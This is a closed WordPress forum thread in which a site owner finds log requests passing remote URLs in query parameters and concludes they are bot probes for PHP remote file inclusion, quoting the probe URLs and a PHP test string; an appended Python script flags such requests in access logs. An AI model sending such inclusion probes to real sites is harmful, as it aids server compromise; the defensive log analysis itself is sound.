• A WP site of mine has suddenly been getting many odd requests such as:

    ?page_id=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F
    ?feed=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F&p=23

    Looks like these would be a new form of comment/search spams or links … I don’t know. I’m guessing.

    P.S. If I wanted to hack my WP to add code to check for queries having “https://…”, i.e. the code that handles $_GET[‘p’], anyone know which WP file that is?

    Thanks
    Anyone else seen anything like this?

Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter mrfrazzlebottom

    (@mrfrazzlebottom)

    UPDATE:

    I just checked the logs for a non-WP site and it too is getting these kinds of queries. So, most likely this is NOT WordPress related.

    Looks like some users/bots are randomly supplying URLs to links that have “arguments” (such as “?p=”).

    I repeat: This is not directly related to WordPress.

    I beg your indulgence.

    Thread Starter mrfrazzlebottom

    (@mrfrazzlebottom)

    YET ANOTHER UPDATE

    I think that these are indicative of a user/bot trying for a PHP exploit. The logged URLs are of already compromised sites, it looks like, with some pages returning this string:

    <?php echo md5("just_a_test");?>

    Some of PHP’s file functions can open/read URLs and not just local files, so, if a PHP-based site simply ‘fopens’ (or some such) a passed argument (i.e. “?p=filetoread”) and then somehow eval’ed that file, an exploit such as this just may find an exploit.

    This is what I am thinking anyway. I do not know enough about WP’s internals to know whether or not an exploit such as this would find anything.

    Thanks again for allowing me to post this. Perhaps it will provide some help to someone.

    I have seen code like this in URLs where content from two different sources is used to populate a two window frameset. Seems that http%3a%2f%2f is just another way to write https:// that doesn’t mess up browsers.

    Here’s an example: https://www.vrbo.com/global/siteFrame.asp?mainurl=http%3a%2f%2fwww.cascadecabin.net&returnurl=/50913
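
A log check for the request pattern discussed in this thread, added here as an example and not code from any poster or from WordPress: it flags query parameters whose percent-decoded value is an absolute URL, including double-encoded ones. The common/combined log format, the sample lines, the placeholder hosts and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute URL.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (%253A -> %3A -> :), bounded."""
    for _ in range(max_rounds):
        if (decoded := unquote(value)) == value:
            break
        value = decoded
    return value

def find_url_parameters(log_line):
    """Return [(param, decoded_value)] for query parameters carrying a URL."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(value)  # parse_qsl already decoded once
        if REMOTE_URL_RE.match(value):
            hits.append((name, value))
    return hits

# Constructed sample lines (hosts and addresses are placeholders).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /?page_id=http%3A%2F%2Fcompromised.example%2Fa%2Fb%2F HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2000:00:00:02 +0000] "GET /?feed=http%253A%252F%252Fcompromised.example%252Fc%252F&p=23 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2000:00:00:03 +0000] "GET /?p=23 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2000:00:00:04 +0000] "GET /?s=notes+on+http+headers HTTP/1.1" 200 2048',
]

def scan(lines):
    """Map client address -> list of flagged (param, value) pairs."""
    report = {}
    for line in lines:
        hits = find_url_parameters(line)
        if hits:
            report.setdefault(line.split(" ", 1)[0], []).extend(hits)
    return report

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, hits)
```

A search term that merely contains the word "http" is not flagged, because the match requires the decoded value to begin with a URL scheme.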

  • The topic ‘odd page requests: ?p=https://…’ is closed to new replies.